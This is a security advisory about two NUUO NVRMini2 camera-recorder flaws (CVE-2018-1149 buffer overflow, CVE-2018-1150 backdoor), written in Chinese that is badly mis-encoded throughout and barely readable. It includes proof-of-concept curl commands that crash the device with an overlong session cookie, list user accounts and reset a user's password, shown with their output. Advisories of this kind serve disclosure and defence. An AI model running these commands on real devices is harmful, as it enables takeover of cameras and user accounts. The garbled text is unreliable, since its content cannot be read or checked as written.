NUUOÉãÏñͷϵͳNVRMini2¶à¸öÎó²î ÍþвԤ¾¯Í¨¸æ
2018-09-18
×ÛÊö
±±¾©Ê±¼ä2018Äê9ÔÂ18ÈÕ£¬Tenable¹ÙÍøÉϹûÕæÁ˹ØÓÚÓÉNUUO¹«Ë¾¿ª·¢µÄÉãÏñͷϵͳNVRMini2±£´æ¶à¸öÑÏÖØÎó²î£¬Î£º¦ÐÅÏ¢ÈçÏ£º
|
ÏîÄ¿ |
ÐÎò |
|
CVE ID |
CVE-2018-1149 CVE-2018-1150 |
|
Nessus²å¼þID |
117427 |
|
CVSSv2»ù×¼/ʱ¼ä·ÖÊý |
10.0 / 8.3 |
|
CVSSv2ÏòÁ¿ |
AV£ºN / AC£ºL / Au£ºN / C£ºC / I£ºC / A£ºC |
|
ÊÜÓ°ÏìµÄ²úÆ· |
NUUO NVRMini2 3.8.0¼°ÒÔϰ汾 |
|
Σº¦ÒòËØ |
ÑÏÖØ |
https://www.tenable.com/security/research/tra-2018-25
¹¥»÷ÑÝʾÊÓÆµÈçÏ£º
http://www.iqiyi.com/w_19s2b6hn11.html
NVRMini2µÄ½á¹¹¼òͼÈçÏÂ
Îó²î¸ÅÊö
CVE-2018-1149£ºÎ´¾Éí·ÝÑéÖ¤µÄÔ¶³Ì¿ÍÕ»»º³åÇøÒç³ö
NVRMini2ϵͳ¶ÔÍâ̻¶ÁËÒ»¸öHTTP»á¼û½Ó¿Úhttp:///cgi-bin/cgi_system£¬Í¨¹ýÕâ¸ö½Ó¿Ú£¬¾ßÓÐȨÏÞµÄÓû§¿ÉÒÔ»á¼ûµ½ÖÕ¶Ë×°±¸¡£cgi_systemÎļþÖеĹ¦Ð§Ö»ÓÐÊÚȨÓû§¿ÉÒÔ»á¼û£¬ÈÏÖ¤µÄÒªÁìΪ½ÏÁ¿Óû§»á¼ûÊý¾ÝCookie×Ö¶ÎÖеÄPHPSESSIDÖµºÍ´æ´¢/tmpĿ¼ÖеÄsessionÎļþÃû£¬¹¹½¨sessionÎļþÃûµÄ´úÂëÈçÏ£º
´Ósub_534a4·µ»ØµÄֵΪ»á»°±êʶ×Ö·û´®¡£³ÌÐò¶Ô¸Ã×Ö·û´®³¤¶ÈûÓÐ×÷ÈκÎÏÞÖÆ¡£µ±×Ö·û¹´×ª´ïµ½sprintfÒÔ¹¹½¨tmpÎļþÃûʱ²¢Ã»ÓнçÏß¼ì²é¡£Òò´Ë£¬Î´¾Éí·ÝÑéÖ¤µÄ¹¥»÷Õß¿ÉÒÔ½«³¬³¤µÄPHPSESSIDÖµÔ¶³Ìת´ï¸øsprintfµ¼Ö»º³åÇøÒç³ö£¬´Ó¶øÔ¶³ÌÖ´ÐдúÂë¡£
²âÊÔ´úÂëÈçÏ£º
curl -v --cookie "PHPSESSID=982e6c010064b3878a4b793bfab8d2d2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;" "http://XXXXXXXXXXXX/cgi-bin/cgi_system?cmd=portCheck"
²âÊÔ´úÂë»áµ¼ÖÂNVRϵͳ»á±¬·¢Íß½âÕ÷Ï󣬾ÓÉÉîÈëÆÊÎö£¬Ò²¿ÉÒÔÔ¶³ÌÖ´ÐдúÂ룬¹¥»÷Õß²»µ«Äܹ»¿ØÖÆNVR£¬»¹¿ÉÒÔ»á¼ûºÍÐÞ¸ÄNVRÖÐËùÓеÄÓû§Æ¾Ö¤Êý¾Ý£¬Ó°ÏìÑÏÖØ¡£
CVE-2018-1150£ººóÃÅ
NVRMini2µÄPHP´úÂëÖг£¼ûµÄϰ¹ßΪ£º
1. ¼ì²éÄ¿½ñPHP»á»°ÊÇ·ñÓÐÓá£
2. ÑéÖ¤»á»°ÊÇ·ñ¾ßÓÐÕýÔÚ»á¼ûµÄÒ³ÃæµÄÊʵ±È¨ÏÞ£¨¼´admin£¬poweruser£¬user£¬root£¬guest£©¡£
¿ÉÊÇ£¬check_session_is_valid£¨£©º¯ÊýÖÐÈ´±£´æºóÃŵĴúÂ룬º¯ÊýÈçÏ£º
if (file_exists(constant("MOSES_FILE"))) //back door
{
update_session();
return 0;
}
ÆäÖбêʶΪ¡°back door¡±µÄ×ÖÑùΪÆäÔ´ÂëÖоͱ£´æµÄ¡£constant("MOSES_FILE")Ö¸ÏòµÄ·¾¶Îª/tmp/moses¡£ÈôÊÇ/tmp/moses/±£´æ£¬ÔòδÊÚȨµÄ¹¥»÷Õß¿ÉÒÔÔ¶³ÌÁгöËùÓзÇadminµÄÓû§£¬²¢ÐÞ¸ÄËûÃǵÄÃÜÂë.
albinolobster@ubuntu:~$ curl http://xxxxxxxxxxx/users_xml.php
<AccountInfo>
<users>
<userinfo><no>1</no><username>testuser</username><group>poweruser</group><displaygroup>power user</displaygroup><live>12345678</live><playback>12345678</playback><ptz>1</ptz><io>1</io><backupdata>1</backupdata><deletedata>1</deletedata><emapsetting>1</emapsetting><remotalksetting>1
</remotalksetting><log>0</log></userinfo>
</users>
<groups>
<groupinfo><no>1</no><groupname>poweruser</groupname><displayname>power user</displayname><groupmembers>testuser</groupmembers></groupinfo><groupinfo><no>2</no><groupname>user</groupname><displayname>user</displayname><groupmembers></groupmembers></groupinfo><groupinfo><no>3</no><groupname>guestuser</groupname><displayname>guestuser</displayname><groupmembers></groupmembers></groupinfo></groups>
</AccountInfo>
test@ubuntu:~$ curl 'http://xxxxxxxxx /users_xml.php?cmd=changepwd&username=testuser&newpwd=pwned'
change password: testuser ok!
½â¾ö¼Æ»®
¹Ù·½¼Æ»®
¹Ù·½ÔÝʱûÓÐÏà¹ØµÄ¼Æ»®£¬½¨Òé°ü¹Ü×°±¸²»Ì»Â¶ÔÚ»¥ÁªÍøÉÏ£¬²¢ÔÚ·À»ðǽװ±¸ÉϼÓÈë¶ÔÉãÏñÍ·HTTP·þÎñµÄ»á¼û¿ØÖÆÕ½ÂÔ¡£
¾ÅÓÎÀÏ¸ç¿Æ¼¼¼Æ»®
¼ì²â¼Æ»®
1. ʹÓþÅÓÎÀÏ¸ç¿Æ¼¼WebÓ¦ÓÃÎó²îɨÃèϵͳ¡¢¾ÅÓÎÀÏ¸ç¿Æ¼¼¾ÅÓÎÀϸçÔ¶³ÌÇå¾²ÆÀ¹Àϵͳ·¢Ã÷ÄÚÍø±£´æÎÊÌâµÄ×°±¸¡£
2. ʹÓþÅÓÎÀÏ¸ç¿Æ¼¼ÍøÂçÈëÇÖ¼ì²âϵͳ·¢Ã÷ÍøÂçÖб£´æµÄ¹¥»÷ÌØÕ÷¡£
·À»¤¼Æ»®
ʹÓþÅÓÎÀÏ¸ç¿Æ¼¼WEBÓ¦Ó÷À»¤ÏµÍ³¡¢¾ÅÓÎÀÏ¸ç¿Æ¼¼NF·À»ðǽϵͳ¡¢¾ÅÓÎÀÏ¸ç¿Æ¼¼ÍøÂçÈëÇÖ·À»¤ÏµÍ³¾ÙÐÐ×°±¸¸ôÀë»òÕß¹¥»÷×è¶Ï¡£
Éù Ã÷
±¾Ç徲ͨ¸æ½öÓÃÀ´ÐÎò¿ÉÄܱ£´æµÄÇå¾²ÎÊÌ⣬¾ÅÓÎÀÏ¸ç¿Æ¼¼²»Îª´ËÇ徲ͨ¸æÌṩÈκΰü¹Ü»òÔÊÐí¡£ÓÉÓÚÈö²¥¡¢Ê¹ÓôËÇ徲ͨ¸æËùÌṩµÄÐÅÏ¢¶øÔì³ÉµÄÈκÎÖ±½Ó»òÕß¼ä½ÓµÄЧ¹û¼°Ëðʧ£¬¾ùÓÉʹÓÃÕß×Ô¼ºÈÏÕæ£¬¾ÅÓÎÀÏ¸ç¿Æ¼¼ÒÔ¼°Ç徲ͨ¸æ×÷Õß²»Îª´Ë¼ç¸ºÈκÎÔðÈΡ£¾ÅÓÎÀÏ¸ç¿Æ¼¼ÓµÓжԴËÇ徲ͨ¸æµÄÐÞ¸ÄÏ¢ÕùÊÍȨ¡£ÈçÓû×ªÔØ»òÈö²¥´ËÇ徲ͨ¸æ£¬±ØÐè°ü¹Ü´ËÇ徲ͨ¸æµÄÍêÕûÐÔ£¬°üÀ¨°æÈ¨ÉùÃ÷µÈËùÓÐÄÚÈÝ¡£Î´¾¾ÅÓÎÀÏ¸ç¿Æ¼¼ÔÊÐí£¬²»µÃí§ÒâÐ޸ĻòÕßÔö¼õ´ËÇ徲ͨ¸æÄÚÈÝ£¬²»µÃÒÔÈκη½·¨½«ÆäÓÃÓÚÉÌҵĿµÄ¡£
¹ØÓÚ¾ÅÓÎÀÏ¸ç¿Æ¼¼
±±¾©ÉñÖݾÅÓÎÀϸçÐÅÏ¢Çå¾²¿Æ¼¼¹É·ÝÓÐÏÞ¹«Ë¾£¨¼ò³Æ¾ÅÓÎÀÏ¸ç¿Æ¼¼£©½¨ÉèÓÚ2000Äê4Ô£¬×ܲ¿Î»ÓÚ±±¾©¡£ÔÚº£ÄÚÍâÉèÓÐ30¶à¸ö·ÖÖ§»ú¹¹£¬ÎªÕþ¸®¡¢ÔËÓªÉÌ¡¢½ðÈÚ¡¢ÄÜÔ´¡¢»¥ÁªÍøÒÔ¼°½ÌÓý¡¢Ò½ÁƵÈÐÐÒµÓû§£¬Ìṩ¾ßÓн¹µã¾ºÕùÁ¦µÄÇå¾²²úÆ·¼°½â¾ö¼Æ»®£¬×ÊÖú¿Í»§ÊµÏÖÓªÒµµÄÇ徲˳³©ÔËÐС£
»ùÓÚ¶àÄêµÄÇå¾²¹¥·ÀÑо¿£¬¾ÅÓÎÀÏ¸ç¿Æ¼¼ÔÚÍøÂç¼°ÖÕ¶ËÇå¾²¡¢»¥ÁªÍø»ù´¡Çå¾²¡¢ºÏ¹æ¼°Çå¾²ÖÎÀíµÈÁìÓò£¬Îª¿Í»§ÌṩÈëÇÖ¼ì²â/·À»¤¡¢¿¹¾Ü¾ø·þÎñ¹¥»÷¡¢Ô¶³ÌÇå¾²ÆÀ¹ÀÒÔ¼°WebÇå¾²·À»¤µÈ²úÆ·ÒÔ¼°×¨ÒµÇå¾²·þÎñ¡£
±±¾©ÉñÖݾÅÓÎÀϸçÐÅÏ¢Çå¾²¿Æ¼¼¹É·ÝÓÐÏÞ¹«Ë¾ÓÚ2014Äê1ÔÂ29ÈÕÆðÔÚÉîÛÚ֤ȯÉúÒâËù´´Òµ°åÉÏÊÐÉúÒ⣬¹ÉƱ¼ò³Æ£º¾ÅÓÎÀÏ¸ç¿Æ¼¼£¬¹ÉƱ´úÂ룺300369¡£

¾ÅÓÎÀϸçÔÆ





